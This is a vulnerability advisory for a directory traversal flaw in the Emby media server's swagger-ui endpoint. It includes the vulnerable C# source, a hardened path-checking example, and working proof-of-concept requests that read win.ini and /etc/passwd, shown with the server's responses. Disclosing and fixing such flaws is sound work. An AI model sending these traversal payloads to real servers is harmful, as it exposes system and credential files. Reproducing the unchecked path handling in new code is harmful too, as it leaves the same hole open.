### Summary
Emby (formerly Media Browser) is a media server designed to organize, play, and stream audio and video to a variety of devices. Emby is open-source, and uses a client-server model. Two comparable media servers are Plex and Windows Media Center.
### Description
The vulnerability was confirmed on the tested platforms, with exposure depending on the version: version 3.1.0 affects the Linux, Windows and Mac releases, while 3.2.5 only affects the Windows release. The resource name passed to the 'swagger-ui' endpoint handled in SwaggerService.cs is not properly verified before being used to load a file from disk. This can be exploited to disclose the contents of arbitrary files via directory traversal attacks.
### Vendor
Emby LLC - https://www.emby.media
### Affected Version
* 3.2.5
* 3.1.5
* 3.1.2
* 3.1.1
* 3.1.0
* 3.0.0
### Tested On
* Microsoft Windows 7 Professional SP1 (EN)
* Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
* Ubuntu Linux 14.04.5
* MacOS Sierra 10.12.3
* SQLite3
### Detail
`/Emby.Server.Implementations/HttpServer/SwaggerService.cs`:
```csharp
using MediaBrowser.Controller;
using MediaBrowser.Controller.Net;
using System.IO;
using MediaBrowser.Model.IO;
using MediaBrowser.Model.Services;

namespace Emby.Server.Implementations.HttpServer
{
    public class SwaggerService : IService, IRequiresRequest
    {
        private readonly IServerApplicationPaths _appPaths;
        private readonly IFileSystem _fileSystem;

        public SwaggerService(IServerApplicationPaths appPaths, IFileSystem fileSystem, IHttpResultFactory resultFactory)
        {
            _appPaths = appPaths;
            _fileSystem = fileSystem;
            _resultFactory = resultFactory;
        }

        /// <summary>
        /// Gets the specified request.
        /// </summary>
        /// <param name="request">The request.</param>
        /// <returns>System.Object.</returns>
        public object Get(GetSwaggerResource request)
        {
            var swaggerDirectory = Path.Combine(_appPaths.ApplicationResourcesPath, "swagger-ui");
            // ResourceName is taken from the request and combined with the directory without any traversal check
            var requestedFile = Path.Combine(swaggerDirectory, request.ResourceName.Replace('/', _fileSystem.DirectorySeparatorChar));
            return _resultFactory.GetStaticFileResult(Request, requestedFile).Result;
        }

        /// <summary>
        /// Gets or sets the result factory.
        /// </summary>
        /// <value>The result factory.</value>
        private readonly IHttpResultFactory _resultFactory;

        /// <summary>
        /// Gets or sets the request context.
        /// </summary>
        /// <value>The request context.</value>
        public IRequest Request { get; set; }
    }
}
```
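The root cause is that `request.ResourceName` flows straight into `Path.Combine`: `..` segments are never rejected, only `/` is rewritten to the platform separator (so `..\` survives on Windows), and a rooted name makes `Path.Combine` drop the base directory entirely. The following is an added example, not Emby's own code or the vendor's fix, showing the containment check a maintainer could put in front of `GetStaticFileResult`. `SafeStaticPath` and `Resolve` are assumed names; the base directory and probe strings in `Main` are constructed to mirror the shapes of the PoC requests.

```csharp
using System;
using System.IO;

// Added example (not Emby's code): a hardened replacement for the path
// construction in SwaggerService.Get. Class and method names are assumptions.
public static class SafeStaticPath
{
    // Returns the canonical absolute path of the requested resource inside
    // baseDirectory, or null if the request must be refused. The caller maps
    // null to a 404/400 response instead of touching the file system.
    public static string Resolve(string baseDirectory, string resourceName)
    {
        if (string.IsNullOrEmpty(resourceName))
            return null;

        // A rooted name (e.g. "/etc/passwd" or "C:\...") would make
        // Path.Combine return it unchanged and ignore baseDirectory.
        if (Path.IsPathRooted(resourceName))
            return null;

        // Treat both separators as separators. Static web resources never
        // legitimately contain a backslash, so normalising it away is safe.
        var relative = resourceName.Replace('\\', '/');

        // Refuse any ".." segment outright: serving a fixed resource tree
        // never needs to walk upwards. This also covers the %2f-encoded Linux
        // PoC, since the HTTP layer has decoded it by the time we see it.
        foreach (var segment in relative.Split('/'))
        {
            if (segment == "..")
                return null;
        }

        // Canonicalise and re-check containment so anything the segment
        // filter missed (a platform-specific quirk, a symlink-free "..")
        // is still caught before a file is opened.
        var root = Path.GetFullPath(baseDirectory)
                       .TrimEnd(Path.DirectorySeparatorChar, Path.AltDirectorySeparatorChar)
                   + Path.DirectorySeparatorChar;
        var full = Path.GetFullPath(
            Path.Combine(root, relative.Replace('/', Path.DirectorySeparatorChar)));

        // NTFS paths are case-insensitive; compare accordingly on Windows.
        var comparison = Environment.OSVersion.Platform == PlatformID.Win32NT
            ? StringComparison.OrdinalIgnoreCase
            : StringComparison.Ordinal;
        return full.StartsWith(root, comparison) ? full : null;
    }

    // Constructed demo: the base directory and probes are not real Emby paths.
    public static void Main()
    {
        var baseDir = Path.Combine(Path.GetTempPath(), "emby-resources", "swagger-ui"); // constructed
        string[] probes =
        {
            "index.html",
            "css/style.css",
            @"..\..\..\..\windows\win.ini",   // shape of the Windows PoC
            "../../../../etc/passwd",         // shape of the Linux PoC after URL decoding
            "/etc/passwd",                    // rooted: Path.Combine alone would return this as-is
        };
        foreach (var probe in probes)
            Console.WriteLine("{0,-32} -> {1}", probe, Resolve(baseDir, probe) ?? "REJECTED");
    }
}
```

Wired into `Get`, the call becomes `var requestedFile = SafeStaticPath.Resolve(swaggerDirectory, request.ResourceName);` followed by a 404 when the result is null; only a non-null path reaches `GetStaticFileResult`. The two layers are deliberate: the segment filter gives a clear, cheap rejection of the obvious probes, and the `GetFullPath` containment check is what actually guarantees the opened file lies under `swagger-ui` regardless of how the name was encoded.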
### PoC
```http
GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
```
```http
HTTP/1.1 200 OK
X-UA-Compatible: IE=Edge
Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
ETag: "07bec80f76d20d26dd300a855219d321"
Cache-Control: public
Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Content-Type: application/octet-stream
Date: Thu, 22 Dec 2016 10:43:53 GMT
Content-Length: 403
Connection: close
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo
```
On Linux:
```
http://127.0.0.1/%2femby%2fswagger-ui%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
```
```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
...
```